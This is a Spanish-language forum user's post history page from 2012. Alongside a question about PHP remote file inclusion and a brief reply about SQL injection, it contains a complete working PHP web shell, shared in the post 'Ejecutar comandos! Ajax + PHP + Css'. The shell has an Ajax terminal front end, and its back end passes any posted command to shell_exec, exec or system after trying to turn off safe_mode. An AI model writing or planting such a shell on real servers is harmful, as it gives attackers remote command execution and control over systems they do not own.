Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - dRak0

Páginas 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
#311
PHP / Problema include()
19 Diciembre 2012, 19:03 PM
Hola que tal , aprendiendome las directivas del php.ini me encontre con allow_url_fopen y allow_url_include , las cuales , segun lo q entendi , te permiten incluir archivos remotos y se aplican en funciones como include() , include_once() , require() y require_once().

Bueno el problema surge probando como funciona esto , al hacer un include(direccion web del archivo remoto) me tira un error 500 , a pesar de tener en el php.ini allow_url_fopen=On y allow_url_include=On , nose cual es el problema..

Ademas tengo otra pregunta , es apartir de esto que surge el RFI(Remote file inclucion) , osea de un include($_GET['archivoaincluir']) ?

Espero sus respuestas!

Gracias por tu tiempo .
#312
Nivel Web / Re: SQLi
18 Diciembre 2012, 06:15 AM
No seria mejor fixear los bugs? Asi aprendes de tus errores.
#313
Nivel Web / Re: Ejecutar comandos ! Aspx + php +css :)
14 Diciembre 2012, 20:49 PM
Perdon , mala mia , estoy sin dormir , intente escribir "ajax" xD! (Igualmente si lees el codigo te das cuenta q quize escribir ajax)
#314
Nivel Web / Ejecutar comandos ! Ajax + PHP +Css :)
14 Diciembre 2012, 16:51 PM
Subir estos archivos:
Buen estaba aburrido y dije me voy a poner a hacer una shell , aca una parte pequeña de mi shell.


ejecutar.php

Código [Seleccionar]

<html>
<head>
<style type="text/css">
body
{
font-size:1.2em;
font-family:"Lucida Console", Lucida, monospace;
font-style:italic;
background-color:black;
color:yellow;
margin:10px;
padding:0px;
}
#jed
{
color:red;
font-family:"Lucida Console", Lucida, monospace;
}
#miDiv
{
color:red;
font-family:"Lucida Console", Lucida, monospace;
font-size:1.2em;
font-style:italic;
}
#comando
{
color:red;
border:none;
font-size:1.2em;
font-style:italic;
background-color:black;
font-family:"Lucida Console", Lucida, monospace;
}
</style>
<script>
function validar(e)
{
 if(document.all)
 {
   tecla=e.keyCode;
 }
 else
 {
   tecla=e.which;
 }
 if(tecla==13)
 {
   ajax();
 }
}
function ajax()
{
var xmlhttp;
t1=document.getElementById('comando').value;
if(window.XMLHttpRequest)
 {
 xmlhttp=new XMLHttpRequest();
 }
else
 {
 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
 }
xmlhttp.onreadystatechange=function()
 {
 if (xmlhttp.readyState==4 && xmlhttp.status==200)
   {
   document.getElementById("miDiv").innerHTML=xmlhttp.responseText;
   }
 }
xmlhttp.open("POST","comando.php",true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("comando="+t1);
}
</script>
</head>
<body>
Written by J3dN4k! Argentinian4EVER.
twitter/jednakk<br /><br />
<div id="jed">J3dN4k><input type="text" id="comando" name="comando" onkeypress="validar(event)"></input>
<!--<button type="button" onclick="ajax()">Enviar</button><br />-->
</div>
<b>
<div id="miDiv">


</div>
</b>
</body>
</html>




comando.php

Código [Seleccionar]

<?php
$q=$_POST['comando'];

if(ini_get('safe_mode'))
{
 ini_set('safe_mode','0');
}
if(function_exists('shell_exec'))
{
$result=shell_exec($q);
}
elseif(function_exists('exec'))
{
exec($q,$result);
}
elseif(function_exists('system'))
{
system($q,$result);
}
else
{
$result="Todas las funciones de ejecutar comandos estan deshabilitadas por el server";
}




if(strlen($result)>0)
{
$response=$result;
}
else
{
$response="Usted ha introducido un comando erroneo !(Bad command)";
}
echo "<pre>".$response."<br />J3dN4k></pre>";
?>



Páginas 1 ... 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32